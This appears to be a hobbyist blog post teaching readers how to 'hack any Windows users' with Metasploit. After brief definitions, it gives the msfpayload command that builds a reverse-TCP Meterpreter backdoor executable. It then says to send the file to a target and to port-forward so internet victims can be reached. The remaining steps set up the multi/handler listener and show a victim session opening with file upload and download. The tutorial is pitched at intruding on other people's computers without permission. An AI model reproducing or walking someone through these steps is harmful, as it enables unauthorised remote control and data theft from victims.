Hacking Windows Users with Metasploit
Hi, welcome to FreeIDMZone
Do you ever wanted to hack other’s computer in your life? If yes, well i’m here to help you. In this guide we are going to hack any Windows users by using Metasploit frameworks. Before we proceed, please read and understand these first. Metasploit
A computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Exploit
An exploit is the means by which an attacker, or pentester for that matter, takes advantage of a flaw within a system, an application, or a service. An attacker uses an exploit to attack a system in a way that results in a particular desired outcome that the developer never intended. Common exploits include buffer overflows, web application vulnerabilities (such as SQL injection), and configuration errors.
Payload
A payload is code that we want the system to execute and that is to be selected and delivered by the Framework. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a Windows command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
Meterpreter
An advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Requirements
- Pentesting Operating System (I recommend Kali Linux)
- Metasploit Framework (Already installed in most Security OS)
- Basic knowledge
Preparing the Backdoor
- Open up your Terminal and type in this command
root@kali:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=88 X>backdoor.exe
- Once the process completed, send the backdoor to your target.
Explanation
The command will set the Payload for our backdoor as reverse tcp for Windows. The LHOST and LPORT is the Ip address and port you want the victim to connect to. Change the LHOST to your IP address in LAN(Local Area Network) and not public/external IP address. You can lookup your IP by typing into Terminal ifconfig. If you want to target people on WAN(Wide Area Network) /Internet you need to port foward first and then you can use your Public/external IP Address. Not to forget, the LPORT number is up to you what number you want to put as long as the port is not in use by other service.
Prepare to Attack
- Once again, open another terminal and type these commands
root@kali:~#service postgresql start
root@kali:~#service metasploit start
- Or you can directly start the service by go to Application>Kali Linux>System Services>Metasploits>Start
- After the initialization process completed, type msfconsole in the terminal. This will takes a moment.
- Type in these command
msf > use exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST your_ip_here
msf exploit (handler) > set LPORT your_port_here
msf exploit (handler) > exploit
Explanation
As you can see the service postgresql start and service metasploit start is to start the service. The command useexploit/multi/handler and set PAYLOAD windows/meterpreter/reverse_tcpmeans that we are going to use metasploit handler and the same exploit that we used to make our backdoor earlier. If you type show options, you will see the LHOST and LPORT are not set up correctly. That’s why we need to set the LHOST and LPORT again with the IP address and port that we use previously for our backdoor. Exploit? I hope you know what that command does
Attacking
- Lets say we have hit a target, so you will see this coming out from your terminal
[*] Started reverse handler on 162.198.37.130:86
[*] Starting the payload handler …
[*] Sending stage (769024 bytes) to 162.198.37.134
[*] Meterpreter session 1 opened (162.198.37.130:86 -> 162.198.37.134:49280 at 2015-07-18
meterpreter>
- Once it says meterpreter session opened, you now can do anything as you like. For example see the Victim system info. Simply type in sysinfo in the terminal.
- You also can download and upload files from/to Victim PC
- For more commands, type in help and you will see bunch of commands
That’s all hope this helps!
Screenshots
Enjoy and Don't Forget To Like US !